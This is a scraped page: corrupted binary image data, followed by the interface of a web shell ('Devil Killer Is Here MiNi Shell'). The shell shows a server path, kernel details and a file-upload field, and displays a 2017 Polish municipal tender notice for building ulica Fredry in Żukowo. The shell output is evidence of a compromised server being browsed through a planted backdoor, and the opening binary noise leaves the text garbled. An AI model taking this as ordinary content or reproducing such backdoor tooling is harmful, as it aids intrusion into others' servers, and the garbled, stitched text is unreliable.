JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170328/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170328/52899-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.zukowo.pl' target='_blank'>http://bip.zukowo.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 52899 - 2017
              z dnia 2017-03-28 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Żukowo: Budowa ulicy Fredry w Żukowie<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Żukowo, krajowy numer identyfikacyjny
              , ul.
              ul. Gdańska 
              52,
              83330  
              Żukowo, woj.
              pomorskie, państwo
              Polska, tel.
              +48 58 6858300, e-mail
              ugzukowo@zukowo.pl, faks
              +48 58 6858300.
              <br />
              Adres strony internetowej (URL): http://bip.zukowo.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.zukowo.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.zukowo.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę nalezy złożć w formie pisemnej. Wykonawca winien zamieścić ofertę w kopecie, która będzie posiadała oznaczenie"Oferta - Budowa ul. Fredry w Żukowie Nr postępowania ZP.271.11.2017 Adres:  Gmina Żukowo ul. Gdańska 52, 83-330 Żukowo Biuro Obsługi Klienta - pok nr 3<br />
                Adres:
                <br />Gmina  Żukowo, ul. Gdańska 52, 83-330 Żukowo</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Budowa ulicy Fredry w Żukowie<br /><b>Numer referencyjny: </b>ZP.271.11.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.Zakres zamówienia obejmuje:
1)Budowę jezdni jednoprzestrzennej, dwukierunkowej, z podstawową szerokością pasa ruchu 2,25 mb
2)Budowę chodnika po jednej stronie jedni o szerokości 2, 0 mb 
3)Budowę zjazdów na posesje zgodnie z założeniami dokumentacji projektowej oraz dodatkowo zjazdy do działek 601/10, 602/8 (2 zjazdy), 603/6, 600/12 (2 zjazdy). 
4)Budowę przyłączy wodociągowych do granicy nieruchomości 
5)Wykonanie oznakowania 
6)Urządzenie zieleni 
7)Budowa kanalizacji sanitarnej wraz z odgałęziami od sieci zgodnie z dokumentacją projektową 
8)Roboty w zakresie wodociągu 
9)Roboty w branży energetycznej  
10)Roboty w branży teletechnicznej 
11)Regulacja wysokościowa istniejącej infrastruktury technicznej w przypadku konieczności dostosowania jej posadowienia do niwelety nowobudowanej nawierzchni 
12) Wykonanie 2 progów wyspowych dostosowanych do prędkości pojazdów 
V=20 km/h,

<br /><br /><b>II.5) Główny kod CPV: </b>45223220-7<br /><b> Dodatkowe kody CPV:</b>45110000-1,
                45100000-8,
                45233222-1,
                45233123-7,
                45233290-8,
                45310000-3,
                45112710-5<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 100<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Realizacji zamówienia: budowa drogi wraz z wszystkimi robotami towarzyszącymi i uzyskaniem pozwolenia na użytkowanie oraz przekazaniem go Zamawiającemu w terminie 100 dni licząc od dnia przekazania placu budowy. Plac budowy zostanie przekazany w terminie 10 dni od daty zawarcia  umowy. Jako zakończenie realizacji przedmiotu zamówienia przyjmuje się dzień przekazania zamawiającemu pozwolenia na użytkowanie. </div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                warunek zdolności  zawodowej: 
aa)  Wykonawca dysponuje  osobami o kwalifikacjach zawodowych: 
1.Kierownik budowy posiadający uprawnienia budowlane w specjalności drogowej bez ograniczeń  1 osoba posiadająca odpowiednie uprawnienia budowlane i legitymująca się 5-cio letnim  doświadczeniem w kierowaniu/nadzorowaniu robotami budowlanymi branży drogowej.

Uprawnienia budowlane, o których mowa powyżej powinny być zgodne z ustawą  z dnia 7 lipca 1994 r. prawo budowlane (t.j. Dz. U. z 2016 r. poz. 290) oraz aktami wykonawczymi do w/w ustawy. Dopuszcza się ważne i odpowiadające im uprawnienia nadane na podstawie wcześniej obowiązujących przepisów.

Ponadto wskazane osoby muszą być zrzeszone we właściwych branżowo izbach samorządów zawodowych zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (t.j. Dz. U. z 2014 r. poz. 1946).

W przypadku wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994 r. prawo budowlane z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r. poz. 65).


ab)  Wykonawca dysponuje doświadczeniem
Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie,    zrealizował (zakończył) co najmniej co najmniej dwa zamówienia (roboty drogowe) polegające na budowie/ przebudowie drogi  o nawierzchni rozbieralnej typu kostka: betonowa, brukowa, kamienna itp. o wartości robót związanych z układaniem nawierzchni (roboty  ziemne, podbudowa i nawierzchnia) nie mniejszej niż 400.000,00 zł netto każda.

Pod pojęciem droga należy rozumieć ulice, drogi, parkingi, place manewrowe, chodniki, ścieżki rowerowe, ciągi pieszo  jezdne. 


Wykonawca wskazuje zamówienia  zakończone to znaczy wykonane i odebrane przez zamawiającego przed upływem terminu składania ofert.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust 5 pkt 1 ustawy PZP</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)Wykaz  robót budowlanych wykonanych w okresie ostatnich 5 lat przed upływem terminu  składania ofert  załącznik nr 5 wraz z dowodami określające czy te roboty budowlane zostały wykonane należycie, zgodnie ze przepisami prawa budowlanego i prawidłowo ukończone 
2)Wykaz osób skierowanych  przez wykonawcę do realizacji zamówienia  załącznik nr 6
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1)do oferty każdy wykonawca musi dołączyć Formularz ofertowy  Załącznik nr 1, aktualne na dzień składania ofert oświadczenie, iż wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu w zakresie wskazanym w załączniku nr 2A,2B,2C do SIWZ. Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. 2) Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w tym celu wykonawca składa pisemne zobowiązanie podmiotu do oddania do dyspozycji wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia. 3) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie, iż wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Dokument ten te ma potwierdzać spełnienie warunków udziału w postępowaniu, brak podstaw do wykluczenia w zakresie, w którym każdy z wykonawców wskazuje spełnienie warunków udziału w postępowaniu. 4)Zamawiający wymaga wskazania przez Wykonawcę w Formularzu Ofertowym  załącznik nr 1 części zamówienia, których wykonanie zamierza powierzyć podwykonawcom i podania przez wykonawcę firm podwykonawców. 5)Pełnomocnictwo  jeśli dotyczy 6)Pisemne zobowiązanie podmiotu do oddania do dyspozycji wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia  załącznik nr 3 (jeśli dotyczy) 7Dowód wniesienia wadium 

Wykonawca nie jest obowiązany do złożenia oświadczeń lub dokumentów potwierdzających okoliczności o których mowa w art. 25 ust 1 pkt 1 i 3 ustawy PZP, jeżeli zamawiający posiada oświadczenia, lub dokumenty dotyczące tego wykonawcy lub może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005r o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U z 2014 poz. 1114 oraz z 2016r poz.352). Zamawiający żąda od wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy PZP przedstawienia w odniesieniu do tych podmiotów dokumentów potwierdzających brak przesłanek wykluczenia z postępowania określonych w art. 24 ust 1 pkt 13-22 oraz 24 ust 5 pkt 1 ustawy PZP. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast odpisu z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust 5 pkt 1 ustawy PZP przedkłada dokument wystawiony w kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Wadium w kwocie: 20.000,00 zł 

Wykonawca może wnieść wadium w jednej lub kilku formach. Wadium może być wniesione w: 1) pieniądzu, 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 3) gwarancjach bankowych, 4) gwarancjach ubezpieczeniowych, 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2014r., poz. 1804 oraz z 2015r poz. 978 i 1240). 

</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres rękojmi</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
